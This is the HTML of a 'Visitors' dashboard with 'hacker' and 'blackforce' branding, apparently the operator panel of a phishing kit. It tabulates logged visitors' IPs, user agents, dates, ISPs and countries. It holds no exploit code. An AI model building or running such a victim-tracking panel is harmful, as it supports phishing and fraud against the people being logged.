<!doctype html>
<html>

<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <link rel="shortcut icon" href="./app/Panel/assets/favicon.ico" type="image/x-icon">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="robots" content="noindex," "nofollow," "noimageindex," "noarchive," "nocache," "nosnippet">
    <!-- CSS FILES -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css">
    <title>Visitors</title>

    <style>
        @import url('https://fonts.googleapis.com/css2?family=Inconsolata&family=Roboto:wght@100;900&display=swap');
        * {
            padding: 0;
            margin: 0;
            font-family: 'Roboto', sans-serif;
            font-weight: lighter;
        }
        
        nav {
            width: 100%;
            height: 130px;
            border-radius: 0;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            border-bottom: 4px solid #009636;
            margin-bottom: 80px;
            position: relative;
        }
        
        #particles-js {
            height: 100%;
            width: 100%;
            background-color: #000;
            position: absolute;
            z-index: -1;
            top: 0;
        }
        
        .bg-op {
            background: #265e412e;
            width: 100%;
            height: 100%;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
        }
        
        .img1 {
            width: 80px;
        }
        
        .img2 {
            width: 160px;
        }
    </style>
</head>

<body>
    <nav>
        <div id="particles-js">
        </div>
        <script src="app/Panel/assets/js/particles.js"></script>
        <script src="app/Panel/assets/js/app.js"></script>
        <div class="bg-op">

            <img class="img1" src="./app/Panel/assets/hacker-25929.png" alt="" srcset="">
            <img class="img2" src="./app/Panel/assets/blackforce.png" alt="" srcset="">

        </div>
    </nav>
    <div class="container-fluid">
        <table class="table table-striped table-sm table-borderless">
            <thead>
                <tr>
                    <th style="font-weight: 900!important;">IP</th>
                    <th style="font-weight: 900!important;">User Agent</th>
                    <th style="font-weight: 900!important;">Date</th>
                    <th style="font-weight: 900!important;">Isp's</th>
                    <th style="font-weight: 900!important;">Country</th>
                </tr>
            </thead>
    </div><tr><th scope='row'>127.0.0.1</th><td>Mozilla/5.0 (iPhone; CPU iPhone OS 16_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1</td><td>2023-12-27 22:32:15</td><td>AS56665 TANGO TELINDUS</td><td>Luxembourg</td></tr><tr><th scope='row'>127.0.0.1</th><td>Mozilla/5.0 (iPhone; CPU iPhone OS 16_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1</td><td>2023-12-29 22:12:34</td><td>AS56665 TANGO TELINDUS</td><td>Luxembourg</td></tr><tr><th scope='row'>127.0.0.1</th><td>Mozilla/5.0 (iPhone; CPU iPhone OS 16_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1</td><td>2023-12-31 21:33:34</td><td>AS56665 TANGO TELINDUS</td><td>Luxembourg</td></tr><tr><th scope='row'>127.0.0.1</th><td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36</td><td>2024-01-02 19:28:53</td><td>AS56665 TANGO TELINDUS</td><td>Luxembourg</td></tr><tr><th scope='row'>127.0.0.1</th><td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36</td><td>2024-01-03 15:31:03</td><td>AS56665 TANGO TELINDUS</td><td>Luxembourg</td></tr><tr><th scope='row'>127.0.0.1</th><td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36</td><td>2024-01-13 08:40:41</td><td>AS6821 Makedonski Telekom AD-Skopje</td><td>North Macedonia</td></tr><tr><th scope='row'>127.0.0.1</th><td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36</td><td>2024-01-13 08:55:35</td><td>AS6821 Makedonski Telekom AD-Skopje</td><td>North Macedonia</td></tr><tr><th scope='row'>127.0.0.1</th><td>Mozilla/5.0 (iPhone; CPU iPhone OS 16_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1</td><td>2024-01-13 19:46:55</td><td>AS6821 Makedonski Telekom AD-Skopje</td><td>North Macedonia</td></tr><tr><th scope='row'>127.0.0.1</th><td>Mozilla/5.0 (iPhone; CPU iPhone OS 16_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1</td><td>2024-01-13 19:52:48</td><td>AS6821 Makedonski Telekom AD-Skopje</td><td>North Macedonia</td></tr>